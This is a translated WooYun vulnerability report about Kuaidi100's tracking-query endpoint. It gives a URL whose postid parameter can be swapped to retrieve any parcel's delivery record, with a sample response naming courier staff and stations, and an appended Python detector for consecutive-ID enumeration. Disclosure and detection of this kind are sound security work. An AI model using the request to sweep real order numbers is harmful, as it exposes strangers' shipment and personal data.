Vulnerability summary (24 followers)
Defect ID: wooyun-2015-099494
Title: Kuaidi100 official site: the source code can be used to obtain tens of thousands of order records
Vendor: Kuaidi100
Author: 0x 80
Submitted: 2015-03-04 18:03
Fix time: 2015-04-18 18:04
Disclosed: 2015-04-18 18:04
Vulnerability type: Sensitive information disclosure
Severity: Medium
Self-assessed rank: 10
Status: Vendor could not be contacted, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-03-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-04-18: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
Anonymous retrieval of tens of thousands of orders using the source code
Detailed description:
http://www.kuaidi100.com/query?id=1&postid=300003849895&temp=0.8066521694418043&type=quanfengkuaidi&valicode=
Proof of vulnerability:
Here postid is the order (tracking) number. It can simply be substituted with another value; it is not encrypted or otherwise protected in any way, so the query is answered for any number supplied.
{
  "message": "ok",
  "nu": "300003849896",
  "companytype": "quanfengkuaidi",
  "ischeck": "1",
  "com": "quanfengkuaidi",
  "updatetime": "2015-03-04 17:09:41",
  "status": "200",
  "condition": "F00",
  "codenumber": "300003849896",
  "data": [
    {"time": "2013-04-29 18:41:32", "location": "", "context": "派件已【签收】,签收人是【本人】签收网点是【福州台江站】", "ftime": "2013-04-29 18:41:32"},
    {"time": "2013-04-27 10:09:15", "location": "", "context": "【福州台江站】的【福州台江站】正在派件,扫描员是【福州台江站】备注【 】", "ftime": "2013-04-27 10:09:15"},
    {"time": "2013-04-27 09:39:37", "location": "", "context": "快件到达【福州台江站】,上一站是【福州分拨中心】扫描员是【福州台江站】备注【 】", "ftime": "2013-04-27 09:39:37"},
    {"time": "2013-04-27 08:47:47", "location": "", "context": "快件在【福州分拨中心】装车,正发往【福州台江站】扫描员是【韩海东】备注【 】", "ftime": "2013-04-27 08:47:47"},
    {"time": "2013-04-26 19:28:01", "location": "", "context": "快件到达【福州分拨中心】,上一站是【临海分拨中心】扫描员是【林锋】备注【 】", "ftime": "2013-04-26 19:28:01"},
    {"time": "2013-04-26 06:42:40", "location": "", "context": "快件在【临海分拨中心】装车,正发往【福州分拨中心】扫描员是【魏仕炎】备注【 】", "ftime": "2013-04-26 06:42:40"},
    {"time": "2013-04-26 06:42:28", "location": "", "context": "快件到达【临海分拨中心】,上一站是【上海分拨中心】扫描员是【杨涛】备注【 】", "ftime": "2013-04-26 06:42:28"},
    {"time": "2013-04-25 20:01:30", "location": "", "context": "快件在【上海分拨中心】装车,正发往【福州分拨中心】扫描员是【吴军联】备注【 】", "ftime": "2013-04-25 20:01:30"},
    {"time": "2013-04-25 19:56:06", "location": "", "context": "快件到达【上海分拨中心】,上一站是【上海市场部】扫描员是【杨齐】备注【 审核中转费计算】", "ftime": "2013-04-25 19:56:06"},
    {"time": "2013-04-25 17:38:30", "location": "", "context": "快件在【上海良无限】装车,正发往【上海】扫描员是【上海良无限】备注【 】", "ftime": "2013-04-25 17:38:30"},
    {"time": "2013-04-25 17:36:56", "location": "", "context": "【上海良无限】的【上海良无限】已收件,扫描员是:【上海良无限】,备注【 】", "ftime": "2013-04-25 17:36:56"}
  ],
  "state": "3"
}
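As an added defender-side example that is not part of the original report, the following Python flags clients whose /query requests walk consecutive postid values, the sweep pattern the report describes, by scanning constructed web-server access-log lines. The log format, the client IPs and the tracking numbers are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Common Log Format); the client IPs and
# postid values are made up for this example and are not from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Mar/2015:17:10:01 +0800] "GET /query?id=1&postid=310000000001&type=quanfengkuaidi HTTP/1.1" 200 1520
10.0.0.5 - - [04/Mar/2015:17:10:02 +0800] "GET /query?id=1&postid=310000000002&type=quanfengkuaidi HTTP/1.1" 200 1498
10.0.0.5 - - [04/Mar/2015:17:10:02 +0800] "GET /query?id=1&postid=310000000003&type=quanfengkuaidi HTTP/1.1" 200 1471
10.0.0.5 - - [04/Mar/2015:17:10:03 +0800] "GET /query?id=1&postid=310000000004&type=quanfengkuaidi HTTP/1.1" 200 1503
10.0.0.5 - - [04/Mar/2015:17:10:03 +0800] "GET /query?id=1&postid=310000000005&type=quanfengkuaidi HTTP/1.1" 200 1488
10.0.0.9 - - [04/Mar/2015:17:11:40 +0800] "GET /query?id=1&postid=310000000001&type=quanfengkuaidi HTTP/1.1" 200 1520
10.0.0.9 - - [04/Mar/2015:17:12:10 +0800] "GET /query?id=1&postid=310000000001&type=quanfengkuaidi HTTP/1.1" 200 1520
"""

# One CLF request line: captures client IP, request target and HTTP status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def postids_by_client(log_text):
    """Map client IP -> list of numeric postid values it fetched from /query."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlparse(target)
        if url.path != "/query" or status != "200":
            continue  # only successful lookups return a record
        for pid in parse_qs(url.query).get("postid", []):
            if pid.isdigit():
                seen[ip].append(int(pid))
    return seen

def find_enumerators(log_text, min_run=4):
    """Return {client IP: longest run} for clients whose distinct postids form a
    run of min_run or more consecutive integers: an ID sweep, not a normal
    lookup of one tracking number (possibly repeated)."""
    suspects = {}
    for ip, pids in postids_by_client(log_text).items():
        uniq = sorted(set(pids))
        best = run = 1
        for prev, cur in zip(uniq, uniq[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_run:
            suspects[ip] = best
    return suspects
```

Running find_enumerators(SAMPLE_LOG) reports 10.0.0.5 with a run of 5, while 10.0.0.9, which repeats a single number, is not flagged.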
Remediation:
Copyright notice: when reposting, please credit 0x 80@WooYun
Vulnerability response
Vendor response:
Vendor could not be contacted, or vendor actively refused